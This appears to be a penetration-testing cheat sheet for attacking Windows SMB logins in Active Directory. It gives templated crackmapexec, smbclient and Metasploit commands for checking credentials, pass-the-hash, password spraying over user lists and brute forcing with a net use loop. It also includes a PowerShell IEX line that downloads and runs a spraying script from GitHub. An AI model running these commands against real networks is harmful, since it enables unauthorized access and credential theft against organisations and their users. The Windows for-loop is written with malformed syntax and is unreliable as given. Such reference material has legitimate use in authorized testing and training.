SMB

Use the SMB service to guess Windows related credentials. Especially usefull in an Active Directory environment.


Check Credentials

crackmapexec
crackmapexec [HOST] -u [USERNAME] -p [PASSWORD] -d [DOMAIN]
Result Description
[+] PWNED Valid credentials and local administrator
[+] green Valid credentials
[-] red Invalid credentials (or other error)

Tip

Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique.

smbclient
smbclient //[HOST]/[SHARE] [PASSWORD] -U [USERNAME] -d [DOMAIN]

You should get an smb: \> prompt in case of working credentials.

Tip

Use --pw-nt-hash and provide the NT hash instead of the password to authenticate using the pass-the-hash technique.

Note

Find available shares using share enumeration techniques.

Password Spray

Always be careful account lockout when performing password spray attacks in an Active Directory environment. See users enumeration techniques to get the list of all AD users and their failed password attempt count.

crackmapexec
for user in $(cat users.txt); do crackmapexec [HOST] -u $user -p [PASSWORD] -d [DOMAIN]; done

All valid users will be automatically saved to the crackmapexec database. Use the creds command of the cmedb utility to display valid credentials.

Info

The database file of cmedb is located at ~/.cme/cme.db.

Metasploit - smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS
set USER_FILE
set SMBDomain
set SMBPass

All valid users will be automatically saved to the workspace creds database.

PowerShell - DomainPasswordSpray.ps1

Automates the whole user enumeration and password spray process when run from whithin the domain.

Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile [VALID-CREDS.txt]

When using the -PasswordList option, it will attempt to gather the account lockout observation window from the domain and limit sprays to one per observation window to avoid locking out accounts.

Invoke-DomainPasswordSpray -PasswordList [PASSWORDS.txt] -OutFile [VALID-CREDS.txt]

Of course, the users list and domain name can also be specified manually.

Invoke-DomainPasswordSpray -Domain [DOMAIN] -UserList [USERS.txt] -Password [PASSWORD] -OutFile [VALID-CREDS.txt]

Note

IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')

Reference: https://github.com/dafthack/DomainPasswordSpray

Brute Force

Native Windows - net use
for /F in %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && pause

Alternatively, we could append our result to a file:

for /F in %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && echo [username]: %i >> [output_file]